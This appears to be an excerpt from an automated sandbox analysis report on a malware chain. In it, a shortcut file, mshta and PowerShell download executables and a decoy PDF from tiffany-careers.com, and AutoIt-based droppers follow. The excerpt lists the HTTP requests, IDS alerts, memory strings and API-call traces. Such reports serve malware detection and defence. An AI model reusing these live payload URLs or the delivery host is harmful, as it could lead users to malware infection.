Source: Binary string: sethc.pdb source: mshta.exe, 00000006.00000003.1784385085.0000021D206B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1764299436.0000021D2467A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1485794840.0000021D24614000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1785367870.0000021D206B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1765703418.0000021D245B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1765157834.0000021D206B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1768177432.0000021D24591000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1485863086.0000021D2466D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1764993316.0000021D2467E000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC7C7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,15_2_00007FF7ADC7C7C0
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC42F50 FindFirstFileExW,15_2_00007FF7ADC42F50
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC8A874 FindFirstFileW,Sleep,FindNextFileW,FindClose,15_2_00007FF7ADC8A874
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC8A4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,15_2_00007FF7ADC8A4F8
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC86428 FindFirstFileW,FindNextFileW,FindClose,15_2_00007FF7ADC86428
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC8A350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,15_2_00007FF7ADC8A350
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC7BC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_00007FF7ADC7BC70
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC7B7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_00007FF7ADC7B7C0
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC872A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,15_2_00007FF7ADC872A8
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC871F4 FindFirstFileW,FindClose,15_2_00007FF7ADC871F4
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00BB4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,23_2_00BB4005
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00BB494A GetFileAttributesW,FindFirstFileW,FindClose,23_2_00BB494A
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00BBC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,23_2_00BBC2FF
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00BBCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,23_2_00BBCD9F
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00BBCD14 FindFirstFileW,FindClose,23_2_00BBCD14
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00BBF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,23_2_00BBF5D8
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00BBF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,23_2_00BBF735
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00BBFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,23_2_00BBFA36
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00BB3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,23_2_00BB3CE2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_00854005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,27_2_00854005
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_0085494A GetFileAttributesW,FindFirstFileW,FindClose,27_2_0085494A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_0085C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,27_2_0085C2FF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_0085CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,27_2_0085CD9F
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_0085CD14 FindFirstFileW,FindClose,27_2_0085CD14
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_0085F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,27_2_0085F5D8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_0085F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,27_2_0085F735
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_0085FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,27_2_0085FA36
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_00853CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,27_2_00853CE2

Networking

barindex
Source: Network traffic | Suricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.8:49722 -> 147.45.49.155:443
Source: global traffic | HTTP traffic detected: GET /Project_Information.pdf HTTP/1.1 | Host: tiffany-careers.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /XKIZdXAs.exe HTTP/1.1 | Host: tiffany-careers.com
Source: global traffic | HTTP traffic detected: GET /ZxVMIVZIX.txt HTTP/1.1 | Host: tiffany-careers.com | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 147.45.49.155
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49711 -> 147.45.49.155:443
Source: Network traffic | Suricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 147.45.49.155:443 -> 192.168.2.8:49722
Source: global traffic | HTTP traffic detected: GET /ghep2412_2 HTTP/1.1 | Accept: */* | Accept-Language: en-CH | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: tiffany-careers.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /ALGglt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: tiffany-careers.com | Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (5 occurrences)
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC8E968 InternetQueryDataAvailable,InternetReadFile,15_2_00007FF7ADC8E968
Source: global traffic | DNS traffic detected: DNS query: tiffany-careers.com
Source: global traffic | DNS traffic detected: DNS query: x1.i.lencr.org
Source: global traffic | DNS traffic detected: DNS query: nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs
Source: Guard.exe, 00000017.00000003.1741865813.0000000004623000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000002.2680808644.000000000385F000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr | String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Guard.exe, 00000017.00000003.1741865813.0000000004623000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000002.2680808644.000000000385F000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr | String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Guard.exe, 00000017.00000003.1741865813.0000000004623000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000002.2680808644.000000000385F000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Guard.exe, 00000017.00000003.1741865813.0000000004623000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000002.2680808644.000000000385F000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr | String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: svchost.exe, 00000008.00000002.2680973778.000001E22AE85000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
Source: qmgr.db.8.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.8.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.8.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.8.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.8.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.8.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.8.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000009.00000002.1680477076.000002822EA53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1932942954.000001E2ABE89000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1740822897.000001E29D715000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: Guard.exe, 00000017.00000003.1741865813.0000000004623000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000002.2680808644.000000000385F000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr | String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Guard.exe, 00000017.00000003.1741865813.0000000004623000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000002.2680808644.000000000385F000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr | String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Guard.exe, 00000017.00000003.1741865813.0000000004623000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000002.2680808644.000000000385F000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: powershell.exe, 00000015.00000002.1740822897.000001E29D6B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.1443126363.0000019635D86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1608154018.000002821E9E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1740822897.000001E29BE11000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Guard.exe, 00000017.00000003.1741865813.0000000004623000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000002.2680808644.000000000385F000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Guard.exe, 00000017.00000003.1741865813.0000000004623000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000002.2680808644.000000000385F000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: powershell.exe, 00000009.00000002.1608154018.000002821F4FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1740822897.000001E29D43B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tiffany-careers.com
Source: powershell.exe, 00000015.00000002.1740822897.000001E29D486000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000015.00000002.1740822897.000001E29D6B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Guard.exe, 00000017.00000003.1741865813.0000000004623000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000002.2670340333.0000000000C19000.00000002.00000001.01000000.00000010.sdmp, SwiftWrite.pif, 0000001B.00000002.2670257397.00000000008B9000.00000002.00000001.01000000.00000011.sdmp, SwiftWrite.pif.23.dr | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: powershell.exe, 00000005.00000002.1443126363.0000019635D39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1443126363.0000019635D4F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1608154018.000002821E9E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1740822897.000001E29BE11000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000015.00000002.1740822897.000001E29D715000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000015.00000002.1740822897.000001E29D715000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000015.00000002.1740822897.000001E29D715000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: svchost.exe, 00000008.00000003.1478698710.000001E22B071000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr | String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000008.00000003.1478698710.000001E22B000000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
Source: powershell.exe, 00000015.00000002.1740822897.000001E29D6B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000015.00000002.1740822897.000001E29CF7F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000015.00000002.2022240307.000001E2B455F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://go.microsoft.c
Source: mshta.exe, 00000006.00000003.1486287260.000002151DB72000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1765184654.000002151DB72000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1791096545.000002151DB72000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1784031189.000002151DB72000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1770561751.000002151DB72000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com
Source: powershell.exe, 00000009.00000002.1680477076.000002822EA53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1932942954.000001E2ABE89000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1740822897.000001E29D715000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000015.00000002.1740822897.000001E29D486000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000015.00000002.1740822897.000001E29D486000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.orgX
Source: powershell.exe, 00000009.00000002.1608154018.000002821F4FB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://tiffany-careers.c
Source: powershell.exe, 00000009.00000002.1608154018.000002821F4FB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://tiffany-careers.co
Source: powershell.exe, 00000009.00000002.1608154018.000002821EC0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1608154018.000002821F4FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1740822897.000001E29CF7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1740822897.000001E29C0C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://tiffany-careers.com
Source: mshta.exe, 00000006.00000002.1791096545.000002151DB77000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1486287260.000002151DB77000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1765184654.000002151DB77000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1784031189.000002151DB77000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1770561751.000002151DB77000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1608154018.000002821F4FB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://tiffany-careers.com/
Source: XKIZdXAs.exe, 0000000F.00000002.1663928310.000001B3D6438000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tiffany-careers.com/ALGglt
Source: powershell.exe, 00000009.00000002.1608154018.000002821EC0A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://tiffany-careers.com/Project_Information.pdf
Source: powershell.exe, 00000009.00000002.1608154018.000002821F4FB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://tiffany-careers.com/XKIZdXAs.exe (the same memory region also holds the progressively longer prefixes /X, /XK, /XKI, /XKIZ, /XKIZd, /XKIZdX, /XKIZdXA, /XKIZdXAs, /XKIZdXAs., /XKIZdXAs.e and /XKIZdXAs.ex of this URL)
Source: powershell.exe, 00000015.00000002.1740822897.000001E29C037000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://tiffany-careers.com/ZxVMIVZIX.txt
Source: mshta.exe, 00000006.00000003.1765184654.000002151DB0A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1770561751.000002151DB36000.00000004.00000020.00020000.00000000.sdmp, n5Szx8qsFB.lnk | String found in binary or memory: https://tiffany-careers.com/ghep2412_2
Source: powershell.exe | String found in binary or memory: https://tiffany-careers.com/ghep2412_2$global:?
Source: mshta.exe, 00000006.00000003.1770484123.0000021D20748000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1784310747.0000021D2074C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1764056549.0000021D20743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1795443084.0000021D2074C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1768320287.0000021D20744000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1794143258.0000021D2068E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1486253359.0000021D2073E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tiffany-careers.com/ghep2412_2...
Source: mshta.exe, 00000006.00000003.1486253359.0000021D2073E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tiffany-careers.com/ghep2412_2...C
Source: mshta.exe, 00000006.00000002.1794143258.0000021D2068E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tiffany-careers.com/ghep2412_2...b
Source: mshta.exe, 00000006.00000002.1794143258.0000021D2068E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tiffany-careers.com/ghep2412_24d
Source: mshta.exe, 00000006.00000002.1790635120.000002151DAC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tiffany-careers.com/ghep2412_2C:
Source: mshta.exe, 00000006.00000002.1791567610.000002151DC20000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://tiffany-careers.com/ghep2412_2H
Source: mshta.exe, 00000006.00000002.1796653110.0000021D262A7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tiffany-careers.com/ghep2412_2LMEMP
Source: powershell.exe, 00000005.00000002.1443126363.000001963619E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://tiffany-careers.com/ghep2412_2P
Source: mshta.exe, 00000006.00000002.1790635120.000002151DAE6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tiffany-careers.com/ghep2412_2Qa
Source: mshta.exe, 00000006.00000003.1765184654.000002151DB36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1770561751.000002151DB36000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tiffany-careers.com/ghep2412_2TTC:
Source: mshta.exe, 00000006.00000003.1778172376.0000021D26645000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://tiffany-careers.com/ghep2412_2https://tiffany-careers.com/ghep2412_2
Source: mshta.exe, 00000006.00000002.1790635120.000002151DAE6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tiffany-careers.com/ghep2412_2kk
Source: powershell.exe, 00000005.00000002.1442345728.0000019633F3B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tiffany-careers.com/ghep2412_2lvEb.
Source: mshta.exe, 00000006.00000002.1790635120.000002151DAC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tiffany-careers.com/ghep2412_2nN
Source: powershell.exe, 00000005.00000002.1443126363.0000019635CF1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1790844992.000002151DB0A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1770561751.000002151DB0A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1765184654.000002151DB0A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tiffany-careers.com/ghep2412_2p
Source: mshta.exe, 00000006.00000002.1791681730.000002151DC80000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tiffany-careers.com/ghep2412_2s
Source: mshta.exe, 00000006.00000002.1790635120.000002151DAE6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tiffany-careers.com/ghep2412_2t
Source: Guard.exe, 00000017.00000003.1741865813.0000000004623000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000002.2680808644.000000000385F000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr | String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: SwiftWrite.pif.23.dr | String found in binary or memory: https://www.globalsign.com/repository/0
Source: Guard.exe, 00000017.00000003.1741865813.0000000004623000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000002.2680808644.000000000385F000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr | String found in binary or memory: https://www.globalsign.com/repository/06
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown | HTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.8:49722 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.8:49729 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC90D24 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,15_2_00007FF7ADC90D24
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00BC4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,23_2_00BC4830
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_00864830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,27_2_00864830
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC90A6C OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,15_2_00007FF7ADC90A6C
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC78E18 GetParent,GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,PostMessageW,PostMessageW,15_2_00007FF7ADC78E18
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00BDD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,23_2_00BDD164
